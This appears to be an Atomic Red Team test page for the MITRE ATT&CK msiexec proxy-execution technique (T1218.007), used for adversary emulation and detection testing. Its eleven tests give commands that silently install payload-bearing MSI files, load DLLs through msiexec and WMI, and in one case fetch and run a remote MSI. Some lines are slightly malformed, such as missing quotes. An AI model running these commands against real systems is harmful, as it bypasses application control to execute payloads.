# T1218.007 - Msiexec
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.

Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)

## Atomic Tests

### Atomic Test #1 - Msiexec.exe - Execute Local MSI file with embedded JScript
Executes an MSI containing embedded JScript code using msiexec.exe

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: The MSI file must exist on disk at specified location (#{msi_payload})

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1218.007\bin\T1218.007_JScript.msi") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218.007\bin\T1218.007_JScript.msi") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi" -OutFile "PathToAtomicsFolder\T1218.007\bin\T1218.007_JScript.msi"

```

In [ ]:
Invoke-AtomicTest T1218.007 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
c:\windows\system32\msiexec.exe /q /i "PathToAtomicsFolder\T1218.007\bin\T1218.007_JScript.msi"
```

In [ ]:
Invoke-AtomicTest T1218.007 -TestNumbers 1

### Atomic Test #2 - Msiexec.exe - Execute Local MSI file with embedded VBScript
Executes an MSI containing embedded VBScript code using msiexec.exe

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: The MSI file must exist on disk at specified location (#{msi_payload})

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1218.007\bin\T1218.007_VBScript.msi") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218.007\bin\T1218.007_VBScript.msi") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_VBScript.msi" -OutFile "PathToAtomicsFolder\T1218.007\bin\T1218.007_VBScript.msi"

```

In [ ]:
Invoke-AtomicTest T1218.007 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
c:\windows\system32\msiexec.exe /q /i "PathToAtomicsFolder\T1218.007\bin\T1218.007_VBScript.msi"
```

In [ ]:
Invoke-AtomicTest T1218.007 -TestNumbers 2

### Atomic Test #3 - Msiexec.exe - Execute Local MSI file with an embedded DLL
Executes an MSI containing an embedded DLL using msiexec.exe

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: The MSI file must exist on disk at specified location (#{msi_payload})

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1218.007\bin\T1218.007_DLL.msi") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218.007\bin\T1218.007_DLL.msi") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_DLL.msi" -OutFile "PathToAtomicsFolder\T1218.007\bin\T1218.007_DLL.msi"

```

In [ ]:
Invoke-AtomicTest T1218.007 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
c:\windows\system32\msiexec.exe /q /i "PathToAtomicsFolder\T1218.007\bin\T1218.007_DLL.msi"
```

In [ ]:
Invoke-AtomicTest T1218.007 -TestNumbers 3

### Atomic Test #4 - Msiexec.exe - Execute Local MSI file with an embedded EXE
Executes an MSI containing an embedded EXE using msiexec.exe

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: The MSI file must exist on disk at specified location (#{msi_payload})

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1218.007\bin\T1218.007_EXE.msi") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218.007\bin\T1218.007_EXE.msi") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_EXE.msi" -OutFile "PathToAtomicsFolder\T1218.007\bin\T1218.007_EXE.msi"

```

In [ ]:
Invoke-AtomicTest T1218.007 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
c:\windows\system32\msiexec.exe /q /i "PathToAtomicsFolder\T1218.007\bin\T1218.007_EXE.msi"
```

In [ ]:
Invoke-AtomicTest T1218.007 -TestNumbers 4

### Atomic Test #5 - WMI Win32_Product Class - Execute Local MSI file with embedded JScript
Executes an MSI containing embedded JScript code using the WMI Win32_Product class

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: The MSI file must exist on disk at specified location (#{msi_payload})

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\T1218.007\bin\T1218.007_JScript.msi") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218.007\bin\T1218.007_JScript.msi") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi" -OutFile "PathToAtomicsFolder\T1218.007\bin\T1218.007_JScript.msi"

```

In [ ]:
Invoke-AtomicTest T1218.007 -TestNumbers 5 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Invoke-CimMethod -ClassName Win32_Product -MethodName Install -Arguments @{ PackageLocation = 'PathToAtomicsFolder\T1218.007\bin\T1218.007_JScript.msi' }
```

In [ ]:
Invoke-AtomicTest T1218.007 -TestNumbers 5

### Atomic Test #6 - WMI Win32_Product Class - Execute Local MSI file with embedded VBScript
Executes an MSI containing embedded VBScript code using the WMI Win32_Product class

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: The MSI file must exist on disk at specified location (#{msi_payload})

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\T1218.007\bin\T1218.007_VBScript.msi") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218.007\bin\T1218.007_VBScript.msi") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_VBScript.msi" -OutFile "PathToAtomicsFolder\T1218.007\bin\T1218.007_VBScript.msi"

```

In [ ]:
Invoke-AtomicTest T1218.007 -TestNumbers 6 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Invoke-CimMethod -ClassName Win32_Product -MethodName Install -Arguments @{ PackageLocation = 'PathToAtomicsFolder\T1218.007\bin\T1218.007_VBScript.msi' }
```

In [ ]:
Invoke-AtomicTest T1218.007 -TestNumbers 6

### Atomic Test #7 - WMI Win32_Product Class - Execute Local MSI file with an embedded DLL
Executes an MSI containing an embedded DLL using the WMI Win32_Product class

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: The MSI file must exist on disk at specified location (#{msi_payload})

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\T1218.007\bin\T1218.007_DLL.msi") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218.007\bin\T1218.007_DLL.msi") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_DLL.msi" -OutFile "PathToAtomicsFolder\T1218.007\bin\T1218.007_DLL.msi"

```

In [ ]:
Invoke-AtomicTest T1218.007 -TestNumbers 7 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Invoke-CimMethod -ClassName Win32_Product -MethodName Install -Arguments @{ PackageLocation = 'PathToAtomicsFolder\T1218.007\bin\T1218.007_DLL.msi' }
```

In [ ]:
Invoke-AtomicTest T1218.007 -TestNumbers 7

### Atomic Test #8 - WMI Win32_Product Class - Execute Local MSI file with an embedded EXE
Executes an MSI containing an embedded EXE using the WMI Win32_Product class

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: The MSI file must exist on disk at specified location (#{msi_payload})

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\T1218.007\bin\T1218.007_EXE.msi") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218.007\bin\T1218.007_EXE.msi") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_EXE.msi" -OutFile "PathToAtomicsFolder\T1218.007\bin\T1218.007_EXE.msi"

```

In [ ]:
Invoke-AtomicTest T1218.007 -TestNumbers 8 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Invoke-CimMethod -ClassName Win32_Product -MethodName Install -Arguments @{ PackageLocation = 'PathToAtomicsFolder\T1218.007\bin\T1218.007_EXE.msi' }
```

In [ ]:
Invoke-AtomicTest T1218.007 -TestNumbers 8

### Atomic Test #9 - Msiexec.exe - Execute the DllRegisterServer function of a DLL
Loads a DLL into msiexec.exe and calls its DllRegisterServer function. Note: the DLL included in the "bin" folder is only built for 64-bit, so this won't work on a 32-bit OS.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: The DLL must exist on disk at specified location (#{dll_payload})

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1218.007\bin\MSIRunner.dll") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218.007\bin\MSIRunner.dll") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/MSIRunner.dll -OutFile "PathToAtomicsFolder\T1218.007\bin\MSIRunner.dll"

```

In [ ]:
Invoke-AtomicTest T1218.007 -TestNumbers 9 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
c:\windows\system32\msiexec.exe /y "PathToAtomicsFolder\T1218.007\bin\MSIRunner.dll"
```

In [ ]:
Invoke-AtomicTest T1218.007 -TestNumbers 9

### Atomic Test #10 - Msiexec.exe - Execute the DllUnregisterServer function of a DLL
Loads a DLL into msiexec.exe and calls its DllUnregisterServer function. Note: the DLL included in the "bin" folder is only built for 64-bit, so this won't work on a 32-bit OS.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: The DLL must exist on disk at specified location (#{dll_payload})

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1218.007\bin\MSIRunner.dll") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218.007\bin\MSIRunner.dll") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/MSIRunner.dll -OutFile "PathToAtomicsFolder\T1218.007\bin\MSIRunner.dll"

```

In [ ]:
Invoke-AtomicTest T1218.007 -TestNumbers 10 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
c:\windows\system32\msiexec.exe /z "PathToAtomicsFolder\T1218.007\bin\MSIRunner.dll"
```

In [ ]:
Invoke-AtomicTest T1218.007 -TestNumbers 10

### Atomic Test #11 - Msiexec.exe - Execute Remote MSI fileExecute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI executes a built-in JScript payload that launches powershell.exe.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
c:\windows\system32\msiexec.exe /q /i "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi"
```

In [ ]:
Invoke-AtomicTest T1218.007 -TestNumbers 11

## Detection
Use process monitoring to monitor the execution and arguments of msiexec.exe. Compare recent invocations of msiexec.exe with prior history of known good arguments and executed MSI files or DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of msiexec.exe may also be useful in determining the origin and purpose of the MSI files or DLLs being executed.